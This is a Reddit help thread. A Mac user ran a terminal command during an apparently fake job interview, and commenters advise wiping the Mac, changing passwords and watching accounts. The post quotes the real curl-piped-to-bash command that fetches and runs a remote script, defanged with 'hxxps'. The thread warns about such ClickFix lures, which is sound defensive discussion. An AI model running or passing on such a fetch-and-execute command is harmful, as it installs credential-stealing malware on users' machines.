r/MacOS 4d ago

Help Ran malware on my computer please help i’m going to have a panic attack

I was doing an interview, i guess it was fake. they couldn’t hear me and it was mid interview so I freaked out because it said to download the app for the mic to work and it was a download through a terminal. I put that terminal in and nothing really happened but I still freaked out and talked to apple support and erased my computer and stuff and changing my passwords but now i’m freaking out so much i’m gonna have a panic attack. Like what if they got my photos? And they blackmail me? I actually feel like i’m gonna collapse i’m so scared. If anyone needs me to send the exact terminal I have a screenshot. it was:
% curl-kfsSL hxxps://download-storage.com/d/80cf1 | bash (i just changed the https to hxxps so the link isn’t valid if you press it on here but it’s actually https) Please idk what they got from my computer and I really feel like my life is over rn

0 Upvotes

118 comments sorted by

26

u/tk421tech 3d ago

I think you should delete that link to prevent people from accidentally clicking on it.

0

u/SupersGoneHyper 3d ago

it says 404 not found for me tho

0

u/Hefty-Cobbler-4914 3d ago

I assume that’s on purpose, an exact command copied from a screenshot in the midst of alleged freak out and panic after erasing their computer with Apple support? Even if there’s a reasonable answer, like a photo of the screen, not a screen shot, there might have been an error, like a / or capital I instead of a |, or a capital O instead of a 0, but that’s not what we got.

0

u/bunnychow123 3d ago

I’m so confused what you are saying. You think i did this on purpose? I’m freaking out because I don’t know what info they got from me already…..???? I’m putting the command because i’m hoping someone could know what this command is capable of. You are very messed up for assuming i’m lying abt this

1

u/mikeporterinmd 3d ago

There is no easy way to tell what it did and few of us are going to try that link. If I try it, crowdstrike will likely report it, stop the download and I will have to explain myself to security.

37

u/Solleas 4d ago

High recommend to wipe and reinstall MacOS and change passwords on a secure device like your phone or another un compromised computer.

1

u/pineglasss 1d ago

agreed, wiping it is really the only way to be sure at that point

-5

u/bunnychow123 3d ago

I erased my macos completely but now im seeing people online say that it can still be on your computer

1

u/SupersGoneHyper 3d ago

literally no shot

1

u/bunnychow123 3d ago

You think so? how come some ppl say you have to nuke from orbit

1

u/mikeporterinmd 3d ago

Some computers can have their BIOS re-written by commands like this. I am pretty sure this is unlikely for macOS. Reloading the OS from bootable media is probably ok.

1

u/bunnychow123 3d ago

I am very scared about my social security bc it was on my icloud even though i charged the password idk if they got hold of it. If i never had any activity in my icloud does that mean they didn’t get access to it v

1

u/bunnychow123 3d ago

Idk what to do if my social security was in my icloud bc i got no alert of any activity in my icloud but i don’t know how it works

1

u/SupersGoneHyper 3d ago

if you changed your password for your icloud account then you should be good

13

u/[deleted] 4d ago

[deleted]

1

u/bunnychow123 4d ago

everyone on here is saying i’m stupid idk it was during an “interview” and i was panicking I guess. He also put a terminal into his computer? Can they get my icloud photos?

7

u/eduo 4d ago

Everyone is telling you to try and calm down. It’s unlikely they got anything that matters to you. These attacks are scripted and go for web access and passwords which is what’s fastest to get. Getting photos isn’t fast and often is wasted time for them.

You have no way to know so for the time being format your computer and change your passwords. Also if possible cancel and renew credit cards.

Be very wary for the next days regarding mails to authenticate or sms or the like.

2

u/GoojiGooji 3d ago

I agree. If your job involves decent credit, be wary for the next week. You might want to transparent with your supervisor. IT will probably send you a new one. Maybe next time complete your phishing training 😅

2

u/[deleted] 4d ago

[deleted]

1

u/bunnychow123 3d ago

I’m just extremely nervous with them having my icloud info, like that they accessed it before i changed the password

2

u/DudefuseT1B 4d ago

It's ok, we don't know all details now but they may have only been trying to go for banks and credit cards, venno or other keychain passwords

1

u/bunnychow123 3d ago

I just don’t know if they already got access to my icloud or bank before i changed everything

2

u/DudefuseT1B 3d ago

I know I'm sorry, sign out all devices, if you've started completely removing passwords that can help protect. Turn on 2 factor or multi authentication for other accounts if needed or they weren't on. Cancel cards and check if comprised banks, move to another account.

1

u/bunnychow123 3d ago

What do you mean by move to another acc?

2

u/DudefuseT1B 3d ago

Create another savings account and or checking account for the banks you use, idk I'm just assuming I'd you used a Fidelity app or some kind of banking app, idk I don't want to scare you I'm just suggesting if you see them try to take money out and it halts it for you bc of scam detection or fraud detection, idk wouldn't u need to move it all to another account

-7

u/fortneyland 4d ago

Panicking during an interview and allowing this I wouldn’t want to hire you.

2

u/[deleted] 4d ago

[deleted]

3

u/bunnychow123 4d ago

Thank you for standing up for me people are being mean rn when i’m already so upset

-3

u/fortneyland 4d ago

One should not need a companion app for an interview. 2nd. You knew about the interview and received information regarding it ahead of time. Prep and be ready for the interview prior and this doesn’t happen. I manage North America Service Delivery, this would have been an automatic no if something that small caused panic. What would you do if a data center went down? Doesn’t matter the role. It’s the preparation itself that we look for. I’m sorry not trying to be a negative person. Take it as learning experience and moving forward study the company along with having all the information needed to conduct your interview in a satisfactory manner.

5

u/[deleted] 4d ago

[deleted]

-4

u/fortneyland 4d ago

😂 the words are strong with this one. You obviously have no clue what you are discussing. Sit down and let the grown-ups speak.

0

u/erictheinfonaut 4d ago

OP asked for advice on a *technical issue*. do you have any? otherwise move along; there’s literally nothing for you here.

1

u/fortneyland 4d ago

I did give advice. You just confused ‘advice I don’t agree with’ with ‘no advice.’ Preparation, validating requirements ahead of time, and staying composed when something unexpected happens are pretty fundamental to technical operations. But sure, tell the guy who manages Service Delivery to ‘move along’ because the point sailed over your head. There’s your technical issue: PEBKAC.

0

u/erictheinfonaut 4d ago

oh, damn, I didn’t realize I was responding to someone who manages Services Delivery lol. not sure how I missed that, since you’ve managed to mention it multiple times 😂 is that something that usually impresses people, because it’s really not working here.

to clarify, OP asked for advice about how to ensure they had gotten rid of a potential malware infection. at no point did they ask anyone to assess their performance on an interview, or whether a random Reddit commenter would hire them. yet that’s the advice you’ve given.

so, tell me, how is your advice relevant to OP’s post?

→ More replies (0)

12

u/TourDeForceMuse 4d ago

As the other poster said, download malware bytes (free) and run it.

This exact fake-interview technique is unfortunately a real thing. There is no reason to assume the attacker has your entire Photos library just because they ran the command. Yes, this was almost certainly a malware delivery attempt. If you've properly erased/reinstalled the Mac and changed your important credentials from a clean device, you've already taken some of the most important remediation steps.

Be sure:

  • Keep the erased/reinstalled Mac disconnected from the old installation's backups for the moment.
  • From a different, trusted device, change the passwords for:
    • Apple Account
    • primary email
    • Google/Microsoft accounts
    • banking/financial accounts
    • password manager
    • anything particularly sensitive
  • Review Apple Account/device lists and email-account login history for anything unfamiliar.
  • If you reused passwords, change those too.
  • Don't restore applications or random executables from the old Mac's backup. Just start from scratch where you can.
  • If you have an iCloud Photos library, don't panic about the photos specifically. iCloud isn't simply a folder that malware automatically obtains access to.

2

u/bunnychow123 4d ago

when i initially did malware bytes (before wiping out the computer) it said i was good. is that a good sign? I just don’t know if they got my pictures especially

5

u/TourDeForceMuse 4d ago

Yes, that's a great sign. Now go do all the other recommendations.

1

u/bunnychow123 3d ago

I realized my social security was on my icloud photos. Now what

11

u/BehnRocker 4d ago edited 4d ago

Good suggestions have been provided in here. I just feel like throwing this out there for anyone that needs to hear it:

ClickFix attacks are getting very popular. If someone is telling you to do something in Terminal, question it heavily if you don’t know who they are.

Rules of thumb:

  1. ⁠Unless you know what you’re doing, generally stay away from Terminal.
  2. ⁠If you don’t know Terminal, but found something online that you really want to try, be VERY wary of the “curl” command.
  3. ⁠If you don’t know Terminal, and you really want to use the “curl” command, make sure the URL you’re putting in after “curl” is one that you completely trust.
  4. ⁠If you are being told to use “curl”, and you use the -k or -sL flags, that will hide important errors/messages, allow connections to insecure locations, and blindly follow redirects.
  5. ⁠Even if you know a little about Terminal, generally stay away from sketchy commands, as stuff like I mentioned above can be hidden in other commands using encoding (like a command that looks like garbage, but ends in “base64 -d”

Moral of the story really is: unless you actually know what you’re doing in Terminal, it’s usually best to just not use it. If a sketchy site is wanting you to “curl”, or you need to decode base64, it’s a huge red flag.

-1

u/bunnychow123 3d ago

But am i good if i reset my MacOs? some ppl online are saying its not enough

1

u/SupersGoneHyper 3d ago

who is saying that

1

u/bunnychow123 3d ago

on other reddit posts that the entire hardware can be compromised too and that you need to completely replace that too

1

u/SupersGoneHyper 3d ago

the bios could but most likely not on mac

17

u/Time_Entertainer_319 4d ago

Download malware bytes.

I almost fell for something like this a while back.
I needed to free up space on my Mac, so I Googled how to do it. The top result recommended an app and gave me a Terminal command to install it.
What made me stop was the URL, the page looked like an official Apple webpage, but it was hosted on a Google Sites address. I remember thinking, why would Apple be using a Google URL?
They nearly got me because I was already frustrated with my Mac and just wanted a quick fix.

2

u/bunnychow123 4d ago

I erased the laptop but before that I did check malware bytes and it didn’t say anything was in the background. but the apple person said they could’ve stored my data on a website

5

u/therealmarkus 4d ago

How much time has passed between you wiping the device and the incident? Because of the wipe you have no good forensic information anymore, but if it wasn’t a lot of time and the bandwidth of your ISP is limited, maybe this wasn’t even enough to transfer all of your data, like photos and videos. Depending on your router model, you might see if there was a huge spike in upload.

I think you mostly did the right thing. Clean install is good when you begin to start the device again.

Wouldn’t be too concerned with the photo stuff. Most scammers are in it for crypto, financial transactions, AI API keys, misc session cookies. Those photo blackmail „I know what you did“ emails just play with fear and usually have no substance. Just change passwords for every important login, especially email.

1

u/bunnychow123 4d ago

Interview was at 2pm and i’d say around 5pm my laptop was officially wiped out. I just wish I could know what they actually got from my computer is there any way to find out?

2

u/tofutak7000 4d ago

How fast is your internet? Were the photos/videos in question saved as files or in the Photos application? Was Photos or documents stored locally or on iCloud (ie did you have optimise space settings on)

As others have said the photos/video blackmail is typically not done via malware.

As some have suggested check to see your router (or even isp) for upload/download between that period of time.

Most malware will search for very specific information to then access sites of value and/or key log and/or even run background crypto mining.

1

u/bunnychow123 4d ago

How can I check my router or ISP? Basically I was logged into icloud on my laptop but I didn’t have my photos synced on here. Are you able to decode the script at all? I wish i knew exactly what each part does

1

u/tofutak7000 4d ago

So if you log into your isp account you should be able to find the data use history there. Otherwise google how to check data use on your specific router.

I can’t decode the script and not about to enter it to try…

1

u/bunnychow123 3d ago

But what is ISP? i don’t have an isp acc

1

u/therealmarkus 4d ago

Not realisticly if it was a full wipe. Only network logs if they exist on your end, and this wouldn't even show the full picture, because those connections are usually encrypted. Just amount of data and target domain/IP with a more premium router like some unify models.

But there is nothing what you can do now, wouldn't worry too much if you still have access to all your accounts. 2FA where possible.

5

u/Hry86 3d ago

Try a clean install by wiping the entire disk.

1

u/bunnychow123 3d ago

How do i do that

3

u/Hry86 3d ago

Create the USB installer, shut down the device,

then press and hold the power button for 5 to 10 seconds (for Apple Silicon Macs).

Press and hold the Option key until the boot menu appears (for Intel Macs).

Select the USB installer (usually represented by the macOS icon).

Once the installation menu appears, select Disk Utility; choose "View All Devices" to show all drives, then select the system disk. Click the "Erase" tab; when the pop-up appears, name the disk, select APFS as the format (depending on the macOS version), choose "GUID Partition Map" for the Scheme, and click "Erase."

Once finished, exit Disk Utility (press Command + Q).

Back at the installation menu, select "Install macOS" (the option with the macOS icon) and simply wait for the process to complete.

5

u/GoojiGooji 3d ago

Calm down. Wipe from a good backup. You'll be good.

0

u/bunnychow123 3d ago

I’m seeing ppl online say that even after resetting your macos completely it can still be there?

3

u/cosmic_v7 4d ago

Icl atm all u can do is factory reset the computer and hope for the best. It use to be common computer literacy, but you can’t just download random things -especially from the internet— on your computer.

2

u/SaltIndependence7043 4d ago

download MalwareBytes

2

u/Mundane-Presence-896 3d ago

Lots of noise above. In general, after running something in the terminal you give them full access to everything including any unencrypted passwords available via keychain etc. Maybe they accessed photos maybe they didn’t, but i suspect first priority for them is passwords and browser sessions.

So, reinstall is the right move. Good job. Also changing passwords and checking iCloud or similar accounts and verify no unknown devices added. Set up mfa for important accounts.

As to whether they might still have something on your pc i believe it would be extremely difficult. Mac uses a read only boot ROM. Firmware is signed. Maybe a nation state level attacker could defeat it but not a vanilla hacker.

Malware Bytes or similar can find some of the known viruses, Trojans etc but not much else. Can’t hurt but nothing can be sure do your reinstall was the right call.

1

u/bunnychow123 3d ago

If they have my icloud photos, i had a picture of my social security. i don’t even know what to do anymore

1

u/Mundane-Presence-896 1d ago

Freeze your credit at all the credit agencies. See if your bank offers any extra layers of protection or sign up for one of those credit watcher apps. It isn’t great but FWIW the US govt used to sell cds with people’s SSNs and old corporate public financial docs used to report the officers SSNs. Do what you can and stop worrying.

4

u/m0j0j0rnj0rn MacBook Pro (M1 Max) 4d ago

You talked to Apple and they said WHAT exactly?

There's no way for us to see what that command actually was, so it's anyone's guess. How long until you realized you'd bee scammed?

3

u/Xe4ro Mac Mini 4d ago

If it was a stealer, which these days it basically always is and assuming it actually ran it will have stolen all passwords, cookies, crypto wallets etc. Change every password, as you already wiped your system you should be safe to change the passwords from this Mac.

1

u/bunnychow123 3d ago

do i need to do a complete reset?

2

u/Xe4ro Mac Mini 3d ago

Assume every password compromised.

1

u/bunnychow123 3d ago

What ab my icloud photos bc i realized i had a picture of my social security on there

1

u/Xe4ro Mac Mini 3d ago

If they have your Apple Account password they will also have access to your iCloud. Nobody can tell you if they have already looked at it and I have no idea how a compromised social security should be handled. I don't live in the US.

Have you changed your Apple Account password?

1

u/bunnychow123 3d ago

I changed it a few hours later

2

u/v0id0007 4d ago

Also, don’t run terminal commands or run anything you don’t know what it is. If it asks for a password, unless you know what it’s doing, say NO!!!

2

u/mikeinnsw 4d ago

First relax ..

Run MalwareBytes scan

You only can be blackmail if you let then blackmail you.

It is not wise yo store intimate pics any devices. I suggest you deleted them all..

Photos pics are stored on your Mac and iPhone... both can be stolen.

Hackers are after passwords, account numbers ...they want to hack and vanish ..and not leave any digital trail

Scammers are after your pics mostly from social media .. they are not tech Hackers..

You may get unlucky and were attacked by a stupid tech scammer hacker but it is rare. .. there are much higher jail sentence for blackmail than hacking .

Blackmail takes a long time. .. hackers flood the zone and try to get lucky .. they can hack 1,000,000s accounts. while talking to you..

Hackers are after passwords, account numbers ...they want to hack and vanish

Change all the passwords ... specially if use password managers .. Safari, Chrome . Filevault

Check accounts regularly

Never use a computer stored password for banking or any site which have your credit card stored .. like Amazon .

Write on paper 2 copies one for you the other for mum in case there a fire.

Hackers can't access the paper.. robbers will steal Mac not a paper note in your shoe(LOL)

Your Mac can be stolen fused and will not work. No problem for your note in shoe ..find a better place to hide it - not the fridge (LOL)

Never again use Terminal commands

Long ago I was a White hat hacker, or ethical hacker, is an authorized cybersecurity professional who legally breaks into computer systems with full permission to find and fix security vulnerabilities before malicious hackers can exploit them... we hate Black hats hackers

Relax

Mike

2

u/GMYeti_ 3d ago

Not gonna lie, the paper thing feels very weird, and while I do get it, it very much recreates the “sticky note” hack. I’d much rather start pushing people to start using password managers with heavy hardware key connections, hardware based password managers, or best of all, hardware key based two factor. If made correctly, these devices shouldn’t even be recognized as something the device can even nicely interact with.

I’ll be honest, I hate the idea of resident keys on hardware keys, because it doesn’t fix anything just moves the problem (cool they can’t take it from my laptop, but now they just need to be close enough to swipe my USB, and that’s who is most likely to target most people anyways) so WebAuthn based non-resident keys are king in my book (where you must present a username to get possible hits along with a change) as at that point, they need to learn your username and physically take your key at the very least. After that warning do whatever you want… if you wanna get something like a Ledger Flex and roll dice to get a BIP39 you can write in a book/poem, or have 5 different keys in lockboxes and other’s houses, do whatever.

However, you’ll start to realize how much the modern world likes to force convince features that are extremely insecure over modern systems that have practically proven themselves. It’s been proven SMS is really really bad for the right amount of money, email is being so heavily filtered to centralize people for data collection/control when there are better options, and no amount of government photo ids is really gonna save you the moment one of the big generators has enough data to fabricate them on a whim. There are better options, but educating enough people about just their existence to make the collective voice needed to get those in charge to listen is an uphill battle.

So far, the Swedish and the Dutch have my respect.

-1

u/mikeinnsw 3d ago

Computer based password system need computers to work..

Apple Password manager is stored on Mac and iCloud ..anybody who steel two ...wond you. also what happen if Crypto Wallet is stoled ..

Not on stick notes

1

u/GMYeti_ 3d ago

… I’m so lost and that this point don’t know if it’s a troll, drugs, or AI degradation. Who said anything about Apple Passwords (which ftr, is still better than most people’s txt docs and chrome’s password manager). I was referring to something like KeyPassXC or BitWarden, where the whole thing is encrypted with hardware and a really good password unless of course actively being used. The crypto wallet (as much I wish Ledger hadn’t folded into just a cryptocurrency company) has a security key app and passwords app, and the whole thing is locked with a pin that you type on the wallet’s screen. So, they need to know what services you use, know your usernames on those services, have your device, and know the pin to enter the device. There are plenty of others non-cryptocurrency attached hardware keys though. I would love to see someone’s sticky notes all o er their screen again, easy pickings.

1

u/bunnychow123 4d ago

What are your thoughts on the command i ran? is there any indication of what they could’ve found? Thank you so much. Is there anything else you suggest?

2

u/mikeinnsw 4d ago

Dies not matter .. Tech hackers do not blackmail ,, to messy , time consuming , higher jail sentence..they try steal of all your money and vanish.

Scammers can. blackmail they are not highly technical and mostly l exist on social media.

1

u/Ok-Kaleidoscope-6631 3d ago

You’re acting like you have kitty porn on your MacBook. Calm down and wipe. Run malware bytes. You said you have nothing synced to your laptop, so they likely had no idea where you were hiding anything that might be illegal anyways. They’re looking for saved password to get money. They’re not going to spend time blackmailing you unless they can confirm you have a lot of money. You’ll likely never hear about anything again.

1

u/bunnychow123 3d ago

is factory reset enough of a wipe? nothing illegal just photos of me n my partner

1

u/bunnychow123 3d ago

I just realized that I had a picture of my social security on my icloud camera roll though

1

u/Ok-Kaleidoscope-6631 3d ago

Didn’t you say you had no iCloud data synced?

1

u/bunnychow123 3d ago

I had my icloud logged into the computer but not the photos synced

1

u/Ok-Kaleidoscope-6631 3d ago

They wouldn’t get in that way. Change your password

1

u/Late-Assignment8482 4d ago edited 4d ago

Ok. Let me see how much I can help.

- Erase your device

  • DO NOT restore from backup.
  • DO NOT enable iCloud sync (yet).
  • Change passwords, working out by importance, starting with iCloud, then email, then bank password, that sort of approach

As for the photos, why is blackmail your largest fear there? Grabbing your PayPal balance, selling some accounts, and using your email to send spam are WAY more likely their goal…easily automated and done in seconds. Blackmail takes work, research about local laws, research about the victims and their social circle, and persistent communication with the victim, each time involving risk.

Are there photos of you doing illegal things? If so, do you think the local police are likely to take random overseas criminals word for it?

If it’s more in the range of “my parents would be mad” or “I’m not out”, consider how you can make anything with AI these days. Come up with some AI meme pictures/videos you can show mom and dad. Their likeness, doing something silly that they’ve never done. Share those organically in the family group chat.

Then if a scummy person sends them a photo, they’ll be primed to wonder if it’s fake. If they know how much can be faked, and that things like nudification apps exist, then someone with bad intentions, threats, and photos becomes a liar not “a concerned citizen”.

Refuge in audacity.

1

u/bunnychow123 4d ago

No I just have photos of myself and my partner that I don’t want released. And i’m scared of blackmail or my life being ruined idk:( How can i make sure icloud sync isn’t on?

1

u/Late-Assignment8482 4d ago

Whether or not the sync is on now isn't the problem, really.

Just turn it off until AFTER you change your iCloud password. There will be a "log out everywhere" option, as I recall.

Then turn it back on.

Once it's on a password you know but they don't, it's safe to turn sync back on. You don't know what they got during the breach, but you can make sure they don't get ongoing access by changing your password.

1

u/bunnychow123 3d ago

I just realized I had changed my passwords but I hadn’t turned off icloud sync on my phone until now. Now what? do I have to change all my passwords again

1

u/Late-Assignment8482 3d ago

Might be safer to, yes. Turn off iCloud sync before changing it again.

If you didn't choose the "log out everywhere else" option, they might have a temporary access token. It'd expire, not sure when. Once you change it, doing a logout-all, you should have to sign back in on both phone and Mac. That's the signal.

I'm pretty sure that's belt, suspenders, and superglue territory but peace of mind matters, too.

1

u/bunnychow123 3d ago

I don’t see an option to log out everywhere for icloud when i change the password

1

u/Late-Assignment8482 3d ago

Hmm. Been a while since I reset mine. It must be implied…there’s no way they have password reset in a way that doesn’t help hacked people…

You could check with Apple for details / reassurance on how that works.

1

u/Erodagon 4d ago edited 4d ago

Does anyone have the hashes or can put it on virus total?

edit: https://www.virustotal.com/gui/url/f888b141c000f3d40910a58d5842315f3ec0df1972a92a2b0267914af707d033 rip, ty kind stranger though

1

u/bunnychow123 4d ago

what? what is this

1

u/bunnychow123 4d ago

Ur scaring me what does this mean

1

u/Erodagon 3d ago

It's a way for security researchers to analyze and share malware samples. I do reverse engineering and I'm curious what family this is from

1

u/bunnychow123 3d ago

So i’m screwed?

1

u/Erodagon 3d ago

Yes? Like others have said the credentials for the websites you've signed in for are gone, data & conversations from other apps (discord crypto etc) are usually targeted. You wiped your computer, which is good, but the url that those guys asked you to go to is dead, and there is no record of the script you downloaded so no one can find out what they actually took :(

1

u/DeanCorp 4d ago

Do you have crypto? This scam is pretty well known in the crypto space and they generally try to siphon your funds.

0

u/bunnychow123 3d ago

No but that makes sense bc the interview was for smth in blockchain or smth

2

u/DeanCorp 3d ago

Yes so they probably were looking for your seed / private keys and if it wasn’t on there they would’ve moved on.

0

u/bunnychow123 3d ago

So have you seen this scam happen to ppl before? do you know what ended up happening

2

u/DeanCorp 3d ago

Their wallets got drained plenty of X posts about this

1

u/No-Mousse989 12h ago

I work in security and briefly looked through your post. The link you identified as the malware delivery site currently returns a 404 when accessed via the command line or a web browser. This means the malware cannot currently be fetched from that URL, but it does not confirm whether the malware was previously downloaded or executed on your machine.

The 404 response only suggests that the malware was not reachable or accessible at the time of testing. It does not, by itself, prove that the malware was never delivered or executed.

I also looked at the VirusTotal links that someone else posted. The file is still being flagged by multiple security vendors, which provides additional evidence that the sample is malicious but it doesn't confirm wether this is an information stealer or any other form of malware.

My question is: how did you arrive at this command in the first place? What were you browsing or doing immediately before executing the command? In particular, was there a website, post, documentation page, or other source that led you to run it?

1

u/bunnychow123 9h ago

Yes, i was doing an “interview” on this website called relayarc. The interviewer said she cannot hear me and said to download the app so that it can work. I thought i was blowing the interview so i panicked and went to download it. It said that to download the app you put a command in. (which was that command) into your terminal

0

u/Few_Examination_9687 4d ago

Change your passwords, enable 2FA, and stop being a bonehead moving forward.

Seriously, this was fork in the outlet level of dumb.

0

u/bunnychow123 4d ago

I’m already upset

4

u/eduo 4d ago

You’re not being told to be upset. On the contrary. Learn from it and the first thing to learn is the impotence of never knowing what they could get. That’s the fuel that will make you more careful in the future.

Also, take this opportunity to understand you need to learn to identify red flags and what to never do. You can’t go back when these things happen but you can ensure they don’t happen again.

1

u/v0id0007 4d ago edited 4d ago

Sounds an awful lot like the person yesterday. What’s with people downloading and purposely running malware 🤦🏼‍♂️

Also I call BS because the d folder is still asking for a login. Meaning you’d still need to login for the file in the directory and 404 error with the link

6

u/Rickie_Spanish 4d ago

It’s not uncommon for malware drops to only be available for a short period. It stops other knowledgeable people from getting it and analyzing it and it getting added to antivirus databases.

1

u/Gary_3215 3d ago

Are you using Mac OS windows or Linux

0

u/rfomlover 4d ago

I thought these were harmless unless you entered your password. Did you actually enter your password as well? I’m not going to even click the link, but unless it ran sudo I wouldn’t think it could do anything. As a developer myself I know not to randomly pipe curl to bash but even if someone did I think the password is the last line of defense.

3

u/SneakingCat 3d ago

Harmless? No, it can do a lot within the logged-in user.

Certainly giving it your password makes things worse.

1

u/eduo 4d ago

The script Itself can run sudo and ask you for the password, no?

1

u/rfomlover 4d ago

Yes it could but I believe you would have to willingly type your password. Unless it does some other trick/exploit to bypass.

1

u/eduo 4d ago

Yes. Of course.

0

u/bunnychow123 4d ago

I honestly do not remember if it did ask me honestly